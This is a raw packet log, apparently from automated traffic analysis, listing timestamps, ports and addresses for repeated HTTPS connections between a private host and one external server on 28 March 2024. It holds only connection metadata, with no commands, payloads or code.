Mar 28, 2024 20:35:11.459379911 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.459691048 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.461508989 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.461524010 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.461590052 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.461594105 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.461906910 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.464562893 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.464577913 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.464641094 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.464653015 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.464931965 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.466741085 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.466754913 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.466844082 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.466850042 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.467165947 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.469258070 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.469275951 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.469340086 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.469343901 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.469726086 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.471221924 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.471241951 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.471313000 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.471318007 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.471616983 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.473983049 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.473999023 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.474083900 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.474092007 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.474436998 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.476022005 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.476043940 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.476126909 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.476131916 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.476497889 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.478811026 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.478827953 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.478910923 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.478914976 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.479239941 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.480724096 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.480741024 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.480833054 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.480839968 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.481173038 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.482695103 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.482712030 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.482799053 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.482808113 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.483103037 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.485299110 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.485371113 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.485414028 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.485419035 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.485459089 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.485477924 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.485477924 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.485521078 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.486068964 CET	49724	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.486085892 CET	443	49724	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.595798016 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.595835924 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.595972061 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.596139908 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.596149921 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.976588964 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.976675034 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.977360010 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.977365017 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:11.977582932 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:11.977587938 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:12.586046934 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:12.586070061 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:12.586082935 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:12.586146116 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:12.586189985 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:12.586195946 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:12.586323023 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:12.670732021 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:12.670747042 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:12.670903921 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:12.670909882 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:12.670948982 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:12.793209076 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:12.793236017 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:12.793278933 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:12.793283939 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:12.793315887 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:12.793334007 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:12.877383947 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:12.877414942 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:12.877496004 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:12.877504110 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:12.877536058 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:12.877542973 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:12.944564104 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:12.944605112 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:12.944679976 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:12.944689035 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:12.944724083 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:12.944742918 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:12.986869097 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:12.986886978 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:12.986965895 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:12.986975908 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:12.987016916 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.023967028 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.023981094 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.024065971 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.024070978 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.024107933 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.062510014 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.062527895 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.062578917 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.062585115 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.062624931 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.091784954 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.091799974 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.091867924 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.091873884 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.091912031 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.128175974 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.128194094 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.128253937 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.128259897 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.128298998 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.159701109 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.159720898 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.159790039 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.159796953 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.159837961 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.180795908 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.180810928 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.180880070 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.180885077 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.180923939 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.202243090 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.202259064 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.202325106 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.202332020 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.202368021 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.223052025 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.223067045 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.223267078 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.223273039 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.223352909 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.239973068 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.239989042 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.240075111 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.240080118 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.240112066 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.252856016 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.252898932 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.252928972 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.252935886 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.252959967 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.252966881 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.252979994 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.253006935 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.253395081 CET	49725	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.253408909 CET	443	49725	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.281806946 CET	49726	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.281833887 CET	443	49726	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.281917095 CET	49726	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.282176018 CET	49726	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.282191992 CET	443	49726	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.663338900 CET	443	49726	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.663503885 CET	49726	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.664118052 CET	49726	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.664135933 CET	443	49726	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:13.664313078 CET	49726	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:13.664318085 CET	443	49726	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:14.271451950 CET	443	49726	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:14.271476984 CET	443	49726	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:14.271492004 CET	443	49726	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:14.271553040 CET	49726	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:14.271629095 CET	49726	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:14.271640062 CET	443	49726	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:14.271703005 CET	49726	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:14.357072115 CET	443	49726	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:14.357114077 CET	443	49726	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:14.357208014 CET	49726	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:14.357223034 CET	443	49726	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:14.357263088 CET	49726	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:14.357263088 CET	49726	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:14.481019974 CET	443	49726	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:14.481040955 CET	443	49726	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:14.481129885 CET	49726	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:14.481153965 CET	443	49726	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:14.481201887 CET	49726	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:14.562599897 CET	443	49726	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:14.562621117 CET	443	49726	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:14.562697887 CET	49726	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:14.562719107 CET	443	49726	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:14.562788963 CET	49726	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:14.620033979 CET	443	49726	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:14.620091915 CET	443	49726	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:14.620115995 CET	443	49726	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:14.620156050 CET	49726	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:14.620364904 CET	49726	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:14.620873928 CET	49726	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:14.620891094 CET	443	49726	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:14.773415089 CET	49727	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:14.773457050 CET	443	49727	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:14.773541927 CET	49727	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:14.773772001 CET	49727	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:14.773782969 CET	443	49727	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:15.153702974 CET	443	49727	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:15.153781891 CET	49727	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:15.154309988 CET	49727	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:15.154321909 CET	443	49727	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:15.154498100 CET	49727	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:15.154504061 CET	443	49727	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:15.154525042 CET	49727	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:15.154529095 CET	443	49727	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:15.934596062 CET	443	49727	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:15.934659958 CET	49727	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:15.934663057 CET	443	49727	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:15.934710026 CET	49727	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:15.935559034 CET	49727	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:15.935579062 CET	443	49727	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:16.079921961 CET	49728	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:16.079966068 CET	443	49728	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:16.080060005 CET	49728	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:16.080250025 CET	49728	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:16.080274105 CET	443	49728	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:16.462054968 CET	443	49728	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:16.462120056 CET	49728	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:16.462665081 CET	49728	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:16.462681055 CET	443	49728	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:16.462826014 CET	49728	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:16.462831974 CET	443	49728	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:17.161736012 CET	443	49728	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:17.161786079 CET	443	49728	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:17.161840916 CET	49728	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:17.161855936 CET	443	49728	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:17.161870003 CET	443	49728	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:17.161895037 CET	49728	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:17.161895037 CET	49728	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:17.161925077 CET	49728	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:17.162185907 CET	49728	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:17.162201881 CET	443	49728	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:17.165046930 CET	49729	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:17.165085077 CET	443	49729	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:17.165168047 CET	49729	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:17.165393114 CET	49729	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:17.165406942 CET	443	49729	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:17.545242071 CET	443	49729	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:17.545372009 CET	49729	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:17.545835972 CET	49729	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:17.545845985 CET	443	49729	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:17.546030045 CET	49729	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:17.546036005 CET	443	49729	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:18.264775038 CET	443	49729	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:18.264839888 CET	443	49729	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:18.264883041 CET	49729	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:18.264911890 CET	49729	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:18.265160084 CET	49729	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:18.265185118 CET	443	49729	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:18.280164003 CET	49730	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:18.280198097 CET	443	49730	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:18.280278921 CET	49730	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:18.280528069 CET	49730	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:18.280543089 CET	443	49730	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:18.660516977 CET	443	49730	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:18.660621881 CET	49730	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:18.660953045 CET	49730	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:18.660959005 CET	443	49730	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:18.661145926 CET	49730	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:18.661149979 CET	443	49730	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:19.349926949 CET	443	49730	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:19.349992990 CET	443	49730	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:19.350013971 CET	49730	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:19.350030899 CET	49730	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:19.351070881 CET	49730	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:19.351083994 CET	443	49730	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:20.328650951 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:20.328686953 CET	443	49731	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:20.328895092 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:20.329000950 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:20.329006910 CET	443	49731	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:20.709722042 CET	443	49731	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:20.709791899 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:20.710263968 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:20.710270882 CET	443	49731	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:20.710462093 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:20.710467100 CET	443	49731	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:20.710516930 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:20.710527897 CET	443	49731	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:20.710536957 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:20.710541010 CET	443	49731	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:20.710589886 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:20.710594893 CET	443	49731	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:20.710684061 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:20.710691929 CET	443	49731	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:20.710705996 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:20.710714102 CET	443	49731	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:20.710745096 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:20.710751057 CET	443	49731	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:20.710833073 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:20.710844040 CET	443	49731	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:20.710859060 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:20.710866928 CET	443	49731	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:20.710885048 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:20.710885048 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:20.710892916 CET	443	49731	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:20.710901976 CET	443	49731	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:20.710916996 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:20.710963011 CET	443	49731	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:20.710989952 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:20.711000919 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:20.711009026 CET	443	49731	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:22.128844976 CET	443	49731	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:22.128925085 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:22.128933907 CET	443	49731	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:22.128950119 CET	443	49731	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:22.128972054 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:22.128994942 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:22.780406952 CET	49731	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:22.780436993 CET	443	49731	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:22.798325062 CET	49732	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:22.798358917 CET	443	49732	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:22.798435926 CET	49732	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:22.799232006 CET	49732	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:22.799247026 CET	443	49732	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:23.180731058 CET	443	49732	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:23.180813074 CET	49732	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:23.181232929 CET	49732	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:23.181243896 CET	443	49732	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:23.181440115 CET	49732	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:23.181447029 CET	443	49732	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:23.889393091 CET	443	49732	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:23.889520884 CET	443	49732	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:23.889528990 CET	49732	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:23.889595985 CET	49732	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:23.889821053 CET	49732	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:23.889838934 CET	443	49732	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:23.891304016 CET	49733	443	192.168.2.6	78.46.229.36
